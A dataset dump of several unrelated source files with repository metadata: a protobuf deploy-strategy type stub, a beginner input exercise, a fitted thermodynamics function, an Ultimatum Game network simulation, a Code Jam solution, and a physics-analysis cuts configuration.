batchNum : typing___Optional[builtin___int] = None,
batchInterval : typing___Optional[builtin___int] = None,
failedStop : typing___Optional[builtin___bool] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> DeployStrategy.BatchStrategy.AutoBatch: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> DeployStrategy.BatchStrategy.AutoBatch: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"batchInterval",b"batchInterval",u"batchNum",b"batchNum",u"failedStop",b"failedStop"]) -> None: ...
class ManualBatch(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class Batches(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
@property
def targets(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[resource_package_tools_sdk___model___easy_flow___deploy_target_pb2___DeployTarget]: ...
def __init__(self,
*,
targets : typing___Optional[typing___Iterable[resource_package_tools_sdk___model___easy_flow___deploy_target_pb2___DeployTarget]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> DeployStrategy.BatchStrategy.ManualBatch.Batches: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> DeployStrategy.BatchStrategy.ManualBatch.Batches: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"targets",b"targets"]) -> None: ...
batchNum = ... # type: builtin___int
batchInterval = ... # type: builtin___int
failedStop = ... # type: builtin___bool
@property
def batches(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[DeployStrategy.BatchStrategy.ManualBatch.Batches]: ...
def __init__(self,
*,
batches : typing___Optional[typing___Iterable[DeployStrategy.BatchStrategy.ManualBatch.Batches]] = None,
batchNum : typing___Optional[builtin___int] = None,
batchInterval : typing___Optional[builtin___int] = None,
failedStop : typing___Optional[builtin___bool] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> DeployStrategy.BatchStrategy.ManualBatch: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> DeployStrategy.BatchStrategy.ManualBatch: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"batchInterval",b"batchInterval",u"batchNum",b"batchNum",u"batches",b"batches",u"failedStop",b"failedStop"]) -> None: ...
type = ... # type: typing___Text
@property
def autoBatch(self) -> DeployStrategy.BatchStrategy.AutoBatch: ...
@property
def manualBatch(self) -> DeployStrategy.BatchStrategy.ManualBatch: ...
def __init__(self,
*,
autoBatch : typing___Optional[DeployStrategy.BatchStrategy.AutoBatch] = None,
manualBatch : typing___Optional[DeployStrategy.BatchStrategy.ManualBatch] = None,
type : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> DeployStrategy.BatchStrategy: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> DeployStrategy.BatchStrategy: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def HasField(self, field_name: typing_extensions___Literal[u"autoBatch",b"autoBatch",u"manualBatch",b"manualBatch"]) -> builtin___bool: ...
def ClearField(self, field_name: typing_extensions___Literal[u"autoBatch",b"autoBatch",u"manualBatch",b"manualBatch",u"type",b"type"]) -> None: ...
class PackageList(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
packageName = ... # type: typing___Text
targetVersion = ... # type: typing___Text
preStop = ... # type: builtin___bool
postRestart = ... # type: builtin___bool
autoStart = ... # type: builtin___bool
userCheck = ... # type: builtin___bool
fullUpdate = ... # type: builtin___bool
packageId = ... # type: typing___Text
installPath = ... # type: typing___Text
type = ... # type: builtin___int
platform = ... # type: typing___Text
@property
def cluster(self) -> resource_package_tools_sdk___model___cmdb___cluster_info_pb2___ClusterInfo: ...
def __init__(self,
*,
packageName : typing___Optional[typing___Text] = None,
cluster : typing___Optional[resource_package_tools_sdk___model___cmdb___cluster_info_pb2___ClusterInfo] = None,
targetVersion : typing___Optional[typing___Text] = None,
preStop : typing___Optional[builtin___bool] = None,
postRestart : typing___Optional[builtin___bool] = None,
autoStart : typing___Optional[builtin___bool] = None,
userCheck : typing___Optional[builtin___bool] = None,
fullUpdate : typing___Optional[builtin___bool] = None,
packageId : typing___Optional[typing___Text] = None,
installPath : typing___Optional[typing___Text] = None,
type : typing___Optional[builtin___int] = None,
platform : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> DeployStrategy.PackageList: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> DeployStrategy.PackageList: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def HasField(self, field_name: typing_extensions___Literal[u"cluster",b"cluster"]) -> builtin___bool: ...
def ClearField(self, field_name: typing_extensions___Literal[u"autoStart",b"autoStart",u"cluster",b"cluster",u"fullUpdate",b"fullUpdate",u"installPath",b"installPath",u"packageId",b"packageId",u"packageName",b"packageName",u"platform",b"platform",u"postRestart",b"postRestart",u"preStop",b"preStop",u"targetVersion",b"targetVersion",u"type",b"type",u"userCheck",b"userCheck"]) -> None: ...
class Status(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
outOfDate = ... # type: builtin___bool
def __init__(self,
*,
outOfDate : typing___Optional[builtin___bool] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> DeployStrategy.Status: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> DeployStrategy.Status: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"outOfDate",b"outOfDate"]) -> None: ...
id = ... # type: typing___Text
name = ... # type: typing___Text
apiVersion = ... # type: typing___Text
org = ... # type: builtin___int
type = ... # type: typing___Text
scope = ... # type: typing___Text
clusterEnvironment = ... # type: typing___Text
clusterType = ... # type: typing___Text
@property
def app(self) -> DeployStrategy.App: ...
@property
def batchStrategy(self) -> DeployStrategy.BatchStrategy: ...
@property
def clusters(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[resource_package_tools_sdk___model___cmdb___cluster_info_pb2___ClusterInfo]: ...
@property
def targetList(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[resource_package_tools_sdk___model___easy_flow___target_info_pb2___TargetInfo]: ...
@property
def packageList(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[DeployStrategy.PackageList]: ...
@property
def status(self) -> DeployStrategy.Status: ...
def __init__(self,
*,
id : typing___Optional[typing___Text] = None,
name : typing___Optional[typing___Text] = None,
apiVersion : typing___Optional[typing___Text] = None,
org : typing___Optional[builtin___int] = None,
app : typing___Optional[DeployStrategy.App] = None,
type : typing___Optional[typing___Text] = None,
batchStrategy : typing___Optional[DeployStrategy.BatchStrategy] = None,
scope : typing___Optional[typing___Text] = None,
clusters : typing___Optional[typing___Iterable[resource_package_tools_sdk___model___cmdb___cluster_info_pb2___ClusterInfo]] = None,
targetList : typing___Optional[typing___Iterable[resource_package_tools_sdk___model___easy_flow___target_info_pb2___TargetInfo]] = None,
clusterEnvironment : typing___Optional[typing___Text] = None,
clusterType : typing___Optional[typing___Text] = None,
packageList : typing___Optional[typing___Iterable[DeployStrategy.PackageList]] = None,
status : typing___Optional[DeployStrategy.Status] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> DeployStrategy: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> DeployStrategy: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def HasField(self, field_name: typing_extensions___Literal[u"app",b"app",u"batchStrategy",b"batchStrategy",u"status",b"status"]) -> builtin___bool: ...
def ClearField(self, field_name: typing_extensions___Literal[u"apiVersion",b"apiVersion",u"app",b"app",u"batchStrategy",b"batchStrategy",u"clusterEnvironment",b"clusterEnvironment",u"clusterType",b"clusterType",u"clusters",b"clusters",u"id",b"id",u"name",b"name",u"org",b"org",u"packageList",b"packageList",u"scope",b"scope",u"status",b"status",u"targetList",b"targetList",u"type",b"type"]) -> None: ...
| [
"[email protected]"
] | |
443ad2b069ebe801ccdc2108f6045a11a4f817f6 | c2e93b806bf439136d7ff651c14601af405eddc5 | /play_input.py | 362bf3b9fe6bed561365d670f1af67ed564a0782 | [] | no_license | mehulchopradev/divya-python-core | 11bdd09072b81a7f4c46ee84170119655f9d7273 | 0d10fd5697686c3fb46ab1f9b42c0b7d2fb771b8 | refs/heads/master | 2020-08-23T20:35:12.946154 | 2019-11-05T03:00:07 | 2019-11-05T03:00:07 | 216,702,503 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | print('Program starts')
n = input('Enter n : ')
# Exception handling
try:
ii = int(n)
except ValueError:
print('Please enter integer value')
else:
# will execute when there is no exception raised in the corresponding try block
print('Odd') if ii % 2 else print('Even')
print('Program ends') | [
"[email protected]"
] | |
6b152beccb5eaa5fe80526c70aa33082e6c766ef | 3a28b1a12d0710c06f6360381ad8be6cf3707907 | /modular_model/triHPC/triHPCThermo/HPCAllTrays4CstmVapO2_px_N2.py | 2fd80c1ca4fc8994a818eb65c208cb1c144cf3b0 | [] | no_license | WheatZhang/DynamicModelling | 6ce1d71d3b55176fd4d77a6aedbaf87e25ce4d02 | ea099245135fe73e8c9590502b9c8b87768cb165 | refs/heads/master | 2020-06-15T14:12:50.373047 | 2019-07-05T01:37:06 | 2019-07-05T01:37:06 | 195,319,788 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 239 | py | def VapO2_px_N2(P,T,x_N2):
x = (P-5.62017561e+02)/2.47804900e-01
y = (T--1.74950614e+02)/6.71933000e-02
z = (x_N2-7.23608844e-01)/7.27108322e-03
output = \
1*1.91797051e+00
y_O2 = output*1.00000000e+00+0.00000000e+00
return y_O2 | [
"[email protected]"
] | |
f69a22886b9e73676be73b0bbedc6f5b740e85fa | 597c4f48332251552a602122bb3d325bc43a9d7f | /etc/04_calculator/01_string.py | e88884554aa8d5499cf5f68d2c4a5093c4f0af83 | [] | no_license | Kyeongrok/python_algorithm | 46de1909befc7b17766a57090a7036886361fd06 | f0cdc221d7908f26572ae67b5c95b12ade007ccd | refs/heads/master | 2023-07-11T03:23:05.782478 | 2023-06-22T06:32:31 | 2023-06-22T06:32:31 | 147,303,654 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 26 | py | string = "1 + 2 * (3 - 4)" | [
"[email protected]"
] | |
aa9645e56df07dec0f994311efd80a58baed1428 | 159bd4c0274271aae7cf2d42bc6819957ee626c9 | /script/UG_Complex_Network_4UD.py | b19380956564614c4ec4e80c552ce2dfa34e0a4b | [] | no_license | Schuck9/UG-in-Weighted-Network | aaa9810e8806d6130ec87c275a169009da460abc | 8e2a6ebde2ed4b9e2f6d2a2ca9d84140c2c5e792 | refs/heads/master | 2021-03-01T04:03:05.983146 | 2020-04-24T02:51:34 | 2020-04-24T02:51:34 | 245,752,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,179 | py | """
A simple implementation of Ultimatum Game in complex network
@date: 2020.3.8
@author: Tingyu Mo
"""
import os
import networkx as nx
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import time
class UG_Complex_Network():
def __init__(self,node_num = 10000,network_type = "SF",update_rule ="NS",player_type = "B",
avg_degree = 4,intensity_selection = 0.01,mutate_rate = 0.001,check_point = None):
self.node_num = node_num
self.avg_degree = avg_degree
self.network_type = network_type # "SF" or "ER"
self.player_type = player_type # "A" or "B" "C"
self.update_rule = update_rule # "SP" or "SP"
self.max_weight = 0.4
self.intensity_selection = intensity_selection
self.mutate_rate = mutate_rate
self.avg_strategy = (0,0)
self.avg_pq_list=[]
if not os.path.exists("./result"):
os.mkdir('./result')
if check_point == None:
self.dir_str = time.strftime("%Y-%m-%d-%H-%M-%S", time.localtime())
os.mkdir("./result/{}".format(self.dir_str))
else:
self.dir_str = check_point
def build_network(self,network_type = None):
'''
building network
'''
print("Building network!")
if network_type == None:
network_type = self.network_type
if network_type == "SF":
G = nx.random_graphs.barabasi_albert_graph(self.node_num, int(self.avg_degree/2))
G = self.network_weights_asign(G)
elif network_type == "ER":
G = nx.random_graphs.erdos_renyi_graph(self.node_num, self.avg_degree/self.node_num)
for n in G.nodes():
if G.degree(n) == 0:
while True:
nbr = np.random.choice(G.nodes(),size = 1)[0]
if nbr != n:
break
G.add_edge(n, nbr)
elif network_type == "RG":
G = nx.random_graphs.random_regular_graph(self.avg_degree, self.node_num)
G = self.network_weights_asign(G)
print("平均连接度为: ",self.avg_degree_caculate(G))
return G
def nbr_weighted_check(self,G,n):
is_MaxWeight_exis = None
for nbr in G.adj[n]:
weight = G.edges[n, nbr]['weight']
if weight == self.max_weight:
is_MaxWeight_exis = nbr
break
return is_MaxWeight_exis
def network_weights_asign(self,G):
#边权重初始化
for n in list(G.nodes()):
nbrs = list(G.adj[n])
for nbr in nbrs:
G.edges[n, nbr]['weight'] = 0
#检查双方是否存在紧密联系者
for n in list(G.nodes()):
nbrs = list(G.adj[n])
for nbr in nbrs:
isMaxWeightExisIn_N = self.nbr_weighted_check(G,n)
isMaxWeightExisIn_Nbr = self.nbr_weighted_check(G,nbr)
if (isMaxWeightExisIn_N == None) and (isMaxWeightExisIn_Nbr == None):
G.edges[n, nbr]['weight'] = self.max_weight
elif (isMaxWeightExisIn_N==nbr) and (isMaxWeightExisIn_Nbr == n):
G.edges[n, nbr]['weight'] = self.max_weight
elif (isMaxWeightExisIn_N != None) or (isMaxWeightExisIn_Nbr != None) :
G.edges[n, nbr]['weight'] = (1-self.max_weight)/(self.avg_degree-1)
# 打印输出
# for n, nbrs in G.adjacency():
# for nbr, eattr in nbrs.items():
# data = eattr['weight']
# print('(%d, %d, %0.3f)' % (n,nbr,data))
cnt = 0
for n in list(G.nodes()):
result = self.nbr_weighted_check(G,n)
if result == None:
cnt += 1
print("无亲密关系者率:",cnt/self.node_num)
return G
def initialize_strategy(self,G):
'''
initialize every node's strategy
'''
self.strategy_asigned(G,list(G.nodes()),Type = self.player_type)
def initialize_payoff(self,G):
'''
clear all player's payoff
'''
for n in list(G.nodes()):
G.nodes[n]['payoff'] = 0
def fitness_calculate(self,G,n):
'''
f = 1-w+w*Π
'''
return 1 - self.intensity_selection + self.intensity_selection*G.nodes[n]['payoff']
def strategy_asigned(self,G,node_list,Type = 'B'):
'''
A B C ,three types inBdividual
'''
if Type == 'B':
for n in node_list:
#Type-A player
strategy = np.random.rand()
G.nodes[n]['p'] = strategy
G.nodes[n]['q'] = 1-strategy
G.nodes[n]['payoff'] = 0
elif Type == 'A':
for n in node_list:
#Type-A player
strategy = np.random.rand()
G.nodes[n]['p'] = strategy
G.nodes[n]['q'] = strategy
G.nodes[n]['payoff'] = 0
elif Type == 'C':
for n in node_list:
#Type-A player
G.nodes[n]['p'] = np.random.rand()
G.nodes[n]['q'] = np.random.rand()
G.nodes[n]['payoff'] = 0
def synchronous_play(self,G):
'''
using synchronous method to play ultimatum game
and update graph every generation
'''
for n, nbrs in G.adjacency():
for nbr, _ in nbrs.items():
# proposer = n ,responder = nbr
offer = G.nodes[n]['p']
demand = G.nodes[nbr]['q']
if offer > demand:
G.nodes[n]['payoff'] += 1-offer
# G.nodes[nbr]['payoff'] += offer
# proposer = nbr ,responder = n
offer = G.nodes[nbr]['p']
demand = G.nodes[n]['q']
if offer > demand:
# G.node[nbr]['payoff'] += 1-offer
G.nodes[n]['payoff'] += offer
num_nbrs = G.degree(n)
if num_nbrs != 0:
G.nodes[n]['payoff'] /= G.degree(n)
def natural_selection(self,G):
'''
each player i in the network selects at random one neighbor j
and compares its payoff Πi with that of j
'''
cnt = 0
for n in list(G.nodes()):
nbrs = list(G.adj[n])
nbr = np.random.choice(nbrs,size = 1)[0]
n_payoff = G.nodes[n]['payoff']
nbr_payoff = G.nodes[nbr]['payoff']
if nbr_payoff > n_payoff:
probs_adopt = (nbr_payoff - n_payoff)/(2*max(G.degree(n),G.degree(nbr)))
if np.random.rand() < probs_adopt:
# n adopts nbr's strategy
cnt += 1
G.nodes[n]['p'] = G.nodes[nbr]['p']
G.nodes[n]['q'] = G.nodes[nbr]['q']
# print("occur:",cnt)
def social_penalty(self,G):
'''
remove the player with lowest payoff and replace it with random one
'''
lowest_n = 0
for n in G.nodes():
if G.nodes[n]['payoff'] < G.nodes[lowest_n]['payoff']:
lowest_n = n
lowest_cluster = list(G.adj[lowest_n])
lowest_cluster.append(lowest_n)
self.strategy_asigned(G,lowest_cluster,Type = self.player_type)
# for n in lowest_cluster:
# #Type-A player
# strategy = np.random.rand()
# G.nodes[n]['p'] = strategy
# G.nodes[n]['q'] = strategy
# G.nodes[n]['payoff'] = 0
def death_birth_updating(self,G):
'''
death-birth updating process,
choose an individual randomly over the whole population,
reproduce the strategy with proportional to nbr's fitness
'''
individual_list = list(G.nodes())
chosen_individual = np.random.choice(individual_list,size=1)[0]
nbrs = list(G.adj[chosen_individual])
reproduce_probability = list()
for nbr in nbrs:
rp = self.fitness_calculate(G,nbr)
reproduce_probability.append(rp)
reproduce_probability = np.array(reproduce_probability)
reproduce_probability /= sum(reproduce_probability)
reproduce_individual = np.random.choice(nbrs,size=1,p = reproduce_probability)[0]
G.nodes[chosen_individual]['p'] = G.nodes[reproduce_individual]['p']
G.nodes[chosen_individual]['q'] = G.nodes[reproduce_individual]['q']
return chosen_individual,reproduce_individual
def birth_death_updating(self,G):
'''
birth death updating process,
choose an individual with proportional to fitnees
replace one of its nbr randomly
'''
individual_list = list(G.nodes())
fitness_list = list()
for n in individual_list:
fitness = self.fitness_calculate(G,n)
fitness_list.append(fitness)
fitness_list = np.array(fitness_list)
fitness_list /= sum(fitness_list)
reproduce_individual = np.random.choice(individual_list,size = 1,p = fitness_list)[0]
nbrs = list(G.adj[reproduce_individual])
chosen_individual = np.random.choice(nbrs,size = 1)[0]
G.nodes[chosen_individual]['p'] = G.nodes[reproduce_individual]['p']
G.nodes[chosen_individual]['q'] = G.nodes[reproduce_individual]['q']
return chosen_individual,reproduce_individual
def pairwise_comparison(self,G):
'''
pairwise comparison process,
choose an individual and its nbr randomlyj
individual imitate its nbr's strategy with probability of 1/1+e^(-w*(Πi-Πj))
'''
individual_list = list(G.nodes())
chosen_individual = np.random.choice(individual_list,size=1)[0]
nbrs = list(G.adj[chosen_individual])
reproduce_individual = np.random.choice(nbrs,size = 1)[0]
imitate_probability = 1/(1+np.exp(-1*self.intensity_selection*(G.nodes[chosen_individual]['payoff']-G.nodes[reproduce_individual]['payoff'])))
if np.random.rand() < imitate_probability:
G.nodes[chosen_individual]['p'] = G.nodes[reproduce_individual]['p']
G.nodes[chosen_individual]['q'] = G.nodes[reproduce_individual]['q']
return chosen_individual,reproduce_individual
def imitaion_updaing(self,G):
'''
imitaion updating process,
choose an individual randomly,
update its strategy with proportional to its & nbrs fitness
'''
individual_list = list(G.nodes())
chosen_individual = np.random.choice(individual_list,size=1)[0]
fitness_list = list()
nbrs = list(G.adj[chosen_individual])
for n in nbrs:
fitness = self.fitness_calculate(G,n)
fitness_list.append(fitness)
nbrs.append(chosen_individual)
near_domain = nbrs
fitness_ci = self.fitness_calculate(G,chosen_individual)
fitness_list.append(fitness_ci)
fitness_list = np.array(fitness_list)
fitness_list /= sum(fitness_list)
reproduce_individual = np.random.choice(near_domain,size =1,p = fitness_list)[0]
G.nodes[chosen_individual]['p'] = G.nodes[reproduce_individual]['p']
G.nodes[chosen_individual]['q'] = G.nodes[reproduce_individual]['q']
return chosen_individual,reproduce_individual
def mutation(self,G,chosen_individual,reproduce_individual):
if np.random.rand(1) <= self.mutate_rate*10:
G.nodes[chosen_individual]['p'],G.nodes[chosen_individual]['q'] = np.random.rand(2)
print("MC")
# else:
# G.nodes[chosen_individual]['p'] = G.nodes[reproduce_individual]['p']
# G.nodes[chosen_individual]['q'] = G.nodes[reproduce_individual]['q']
def update(self,G):
'''
natural seletion an social penalty
'''
if self.update_rule == "NS":
chosen_individual,reproduce_individual = self.natural_selection(G)
elif self.update_rule == "SP":
chosen_individual,reproduce_individual = self.social_penalty(G)
elif self.update_rule == "DB":
chosen_individual,reproduce_individual = self.death_birth_updating(G)
elif self.update_rule == "BD":
chosen_individual,reproduce_individual = self.birth_death_updating(G)
elif self.update_rule == "PC":
chosen_individual,reproduce_individual = self.pairwise_comparison(G)
elif self.update_rule == "IU":
chosen_individual,reproduce_individual = self.imitaion_updaing(G)
self.mutation(G,chosen_individual,reproduce_individual)
def avg_strategy_calculate(self,G,Epoch):
'''
calculate the mean strategy over arg Epoch
'''
p_vector = self.get_all_values(G,'p')
q_vector = self.get_all_values(G,'q')
p,q = self.avg_strategy #the Epoch-1's average strategy
p = ((p*self.node_num*(Epoch-1)) + np.sum(p_vector))*1.0/(Epoch*self.node_num)
q = ((q*self.node_num*(Epoch-1)) + np.sum(q_vector))*1.0/(Epoch*self.node_num)
# self.avg_pq_list.append((p,q))
return (p,q)
def save(self,G,Epoch):
#Save Graph
result_dir = './result/'
info = "{}_{}_{}_{}_{}_{}".format(self.network_type,self.player_type,self.update_rule,self.intensity_selection,self.mutate_rate,Epoch)
Epoch_dir = os.path.join(result_dir,self.dir_str,info)
if not os.path.exists(Epoch_dir):
os.mkdir(Epoch_dir)
graph_path = os.path.join(Epoch_dir,info+"_Graph.yaml")
nx.write_yaml(G,graph_path)
#Save strategy
p_vector = self.get_all_values(G,'p')
q_vector = self.get_all_values(G,'q')
pq_array = np.vstack((p_vector,q_vector))
pq_path = os.path.join(Epoch_dir,info+"_strategy.csv")
pq = pd.DataFrame(data = pq_array)
pq.to_csv(pq_path)
#Save average offer/respond
avg_pq_path = os.path.join(Epoch_dir,info+"_average_strategy.csv")
avg_pq = pd.DataFrame(data = self.avg_pq_list)
avg_pq.to_csv(avg_pq_path)
def retrain(self,filepath):
'''
continue evolution from specific check point
'''
print(filepath)
filepath = os.path.join('./result/',filepath)
lists = os.listdir(filepath)
lists.sort(key=lambda fn: os.path.getmtime(filepath + "/" + fn))
result_dir = os.path.join(filepath, lists[-1])
result_list = os.listdir(result_dir)
result_list.sort()
parse_str = result_list[0][:-5].split("_")
self.network_type = parse_str[0]
self.player_type = parse_str[1]
self.update_rule = parse_str[2]
self.intensity_selection = float(parse_str[3])
self.mutate_rate = float(parse_str[4])
Epoch = int(parse_str[5])
graph_path = os.path.join(result_dir,result_list[0])
avg_pq_path = os.path.join(result_dir,result_list[1])
avg_pq = pd.read_csv(avg_pq_path)
self.avg_strategy = avg_pq.values[-1][1:]
G = nx.read_yaml(graph_path)
return G,Epoch+1
def get_all_values(self,G,attr_name):
'''
get specific attribute values of all nodes
'''
value_dict = nx.get_node_attributes(G,attr_name)
value_list = list(value_dict.values())
return value_list
def pq_distribution(self,G,attr_name):
x_axis = np.arange(0,1.05,1/20) # 21 descrete points,range 0~1,step size 0.05
y_axis = np.zeros(x_axis.size)
value_list = self.get_all_values(G,attr_name)
for v in value_list:
for i in range(x_axis.size):
if abs(v-x_axis[i]) < 0.05:
y_axis[i] += 1
return (x_axis,y_axis)
def avg_degree_caculate(self,G):
'''
caculate average degree of graph
'''
degree_total = 0
for x in range(len(G.degree())):
degree_total = degree_total + G.degree(x)
return degree_total/self.node_num
if __name__ == '__main__':
node_num = 100
network_type = "RG" # [SF, ER, RG]
update_rule ='PC' # [NS, SP, DB, BD, PC, IU]
player_type = "C" # [A=(p=q,q), B=(p,1-p), C=(p,q)]
avg_degree = 4
intensity_selection = 0.01
mutate_rate = 0.001
avg_strategy_list = []
Epochs = pow(10,7)
check_point = None
# check_point = '2020-03-08-11-52-42'
if check_point != None:
UG = UG_Complex_Network(node_num,network_type,update_rule,player_type,avg_degree,intensity_selection,mutate_rate,check_point)
G,Start = UG.retrain(check_point)
else:
Start = 1
UG = UG_Complex_Network(node_num,network_type,update_rule,player_type,avg_degree,intensity_selection)
#bulids network structure
G = UG.build_network()
#initialize the strategy of player in network
UG.initialize_strategy(G)
#play game
for Epoch in range(Start,Epochs+1):
UG.initialize_payoff(G)
UG.synchronous_play(G)
UG.update(G)
UG.avg_strategy = UG.avg_strategy_calculate(G,Epoch)
if Epoch % 10000 == 0:
print("Epoch[{}]".format(Epoch))
print("Average strategy: (p ,q)={}\n".format(UG.avg_strategy))
UG.avg_pq_list.append(UG.avg_strategy)
UG.save(G,Epoch)
# UG.viz(G)
| [
"[email protected]"
] | |
59b39957186f3c76e740d3bac8084fb63519bf5e | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_135/3066.py | fce606fdb7b3bf7e4ebcb4d8aa5331d6907dbeba | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,265 | py | fin = open('in', 'r')
fout = open('out', 'w')
numberOfCases = int(fin.readline())
def findChosenRow():
answer = int(fin.readline())
for rowNum in range (1,5):
row = fin.readline()
if rowNum == answer:
cosenRow = row.split()
cosenRow = [int(string) for string in cosenRow]
return cosenRow
def findCommonCard(firstRow, secondRow):
numOfCommons = 0
possibleAnswer = 0
for card1 in firstRow:
for card2 in secondRow:
if card1 == card2:
possibleAnswer = card1
numOfCommons += 1
if numOfCommons == 1:
return possibleAnswer
if numOfCommons > 1:
return 0
if numOfCommons == 0:
return -1
for case in range(1,numberOfCases + 1):
firstRow = findChosenRow()
secondRow = findChosenRow()
answer = findCommonCard(firstRow, secondRow)
if answer > 0:
fout.write('case #' + str(case) + ': ' + str(answer) + '\n')
elif answer == 0:
fout.write('case #' + str(case) + ': Bad magician!\n')
elif answer == -1:
fout.write('case #' + str(case) + ': Volunteer cheated!\n')
def method():
pass
fin.close()
fout.close()
| [
"[email protected]"
] | |
26f14e295a03e3cd20d40a232caddf97471a11f2 | afc8d5a9b1c2dd476ea59a7211b455732806fdfd | /Configurations/VBF/Full2016DNN/cuts.py | cfe23e2e39ec86c60d657dd0498314605d02f098 | [] | no_license | latinos/PlotsConfigurations | 6d88a5ad828dde4a7f45c68765081ed182fcda21 | 02417839021e2112e740607b0fb78e09b58c930f | refs/heads/master | 2023-08-18T20:39:31.954943 | 2023-08-18T09:23:34 | 2023-08-18T09:23:34 | 39,819,875 | 10 | 63 | null | 2023-08-10T14:08:04 | 2015-07-28T07:36:50 | Python | UTF-8 | Python | false | false | 13,831 | py | # cuts
#cuts = {}
supercut = 'mll>12 \
&& std_vector_lepton_pt[0]>25 && std_vector_lepton_pt[1]>10 \
&& std_vector_lepton_pt[2]<10 \
&& metPfType1 > 20 \
&& ptll > 30 \
&& (std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
'
cuts['hww2l2v_13TeV_of2j_vbf_incl'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
&& (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
&& (mth>=60 && mth<125) \
&& (njet==2) \
&& (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
&& (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
&& (detajj>3.5 && mjj>=400) \
&& (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
&& '+bVeto+' \
'
cuts['hww2l2v_13TeV_of2j_vbf_incl_NOdetajj'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
&& (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
&& (mth>=60 && mth<125) \
&& (njet==2) \
&& (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
&& (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
&& (mjj>=400) \
&& (std_vector_jet_pt[0]>30 && std_vector_jet_pt[1]>30) \
&& '+bVeto+' \
'
#cuts['hww2l2v_13TeV_of2j_vbf_DNNgt09'] = '(std_vector_lepton_flavour[0] * std_vector_lepton_flavour[1] == -11*13) \
# && (abs(std_vector_lepton_flavour[1]) == 13 || std_vector_lepton_pt[1]>13) \
# && (mth>=60 && mth<125) \
# && (njet==2) \
# && (abs((std_vector_lepton_eta[0] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (abs((std_vector_lepton_eta[1] - (jeteta1+jeteta2)/2)/detajj) < 0.5) \
# && (detajj>3.5 && mjj>=400) \
